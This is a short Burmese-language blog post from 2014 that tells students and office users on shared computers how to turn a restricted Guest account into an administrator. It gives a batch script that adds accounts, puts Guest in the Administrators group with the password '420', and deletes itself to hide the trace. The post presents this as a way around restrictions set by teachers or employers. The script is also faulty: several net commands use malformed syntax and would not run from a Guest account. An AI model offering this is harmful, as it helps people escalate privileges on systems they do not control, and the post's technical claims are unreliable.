Sunday, February 9, 2014

Guest အကောင့်ကနေ Admin ကို hack နည်း


ကျွန်တော်သူငယ်ချင်းတွေအတွက် အဆင်ပြေမည့် နည်းလမ်းလေး တစ်ခုဖြစ်ပါတယ်။ ကွန်ပျူတာကို ကျွန်တော်တို့ ကျောင်းတွေ ရုံးတွေ စာသင်ခန်းတွေမှာ user တွေ တစ်ခုချင်ဆီ သတ်မှတ်ပြီး သုံးရပါတယ်။ ဥပမာ Administrator ကိုတော့ ဆရာက သုံးပြီး Guest ကိုတော့ ကျောင်းသားကို ပေးသုံးတယ်ဆိုပါစို့။ အဲဒီလို မိမိက Guest သုံးရတာ ဖြစ်တဲ့အတွက် အကန့်အသန့် ရှိပါတယ်။ ဥပမာ internet သုံးချင်တာတောင် သုံးလို့ မရဘူးဖြစ်နေပါတယ်။( လေမရှည်တော့ဘူး) ဒါကြောင့် မိမိက Guest သုံးနေရလို့ Administrator လို လွတ်လပ်စွာ သုံးခွင့်မရလို့ စိတ်ညစ်နေတဲ့ သူငယ်ချင်းများအတွက် အောက်ပါအတိုင်း bat ဖိုင်တစ်ခု တည်ဆောက်ပြီး Administrator တစ်ယောက်ကဲ့သို့ Guest ကနေ အသုံးပြုလို့ရအောင် စမ်းသပ်ကြည့်နိုင်ပါတယ်။ အဆင်ပြေမှာပါ။ နောက်အသုံးဝင်နိုင်သေးတာက Administrator Password မေ့သွားရင်လည် ဒီနည်းနဲ့ အသုံးပြုနိုင်ပါတယ်။ (မှတ်ချက်။ ။ Administrator Password မေ့ရင် ပြန်ဖော်တဲ့နည်းကို ကျွန်တော် တင်ပြခဲ့ပြီးဖြစ်ပါတယ်။ Windows XP Label မှာ ဖတ်နိုင်ပါတယ်။)

1. Start >> Run >> notepad လို့ရိုက်ပြီး Enter ခေါက်လိုက်ပါ။ ကျလာတဲ့ notepad ထဲကို အောက်က code တွေကို copy လုပ်ပြီးထည့်လိုက်ပါ။

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

ပြီရင် Guest2admin.bat လို့ Save လိုက်ပါ.။

2.Guest2admin.bat ဖိုင်ကို Double click လုပ်ပြီး ဖွင့်လိုက်ပါ။ ဒါဆိုရင် အဆင်ပြေပါပြီး နောက်ပိုင်းဖြစ်တာကိုတော့ ကိုယ်တိုင်းစမ်းကြည့်စေလိုပါတယ်..။
အခက်အခဲတွေ နောက်မှာ သင့်ရဲ့အောင်မြင်မှုရှိုတယ်...။

အဆင်ပြေချမ်းမြေ့ပါစေ ( နည်းပညာလောကထဲက ပုရွက်ဆိတ်ကလေး )

No comments:

Post a Comment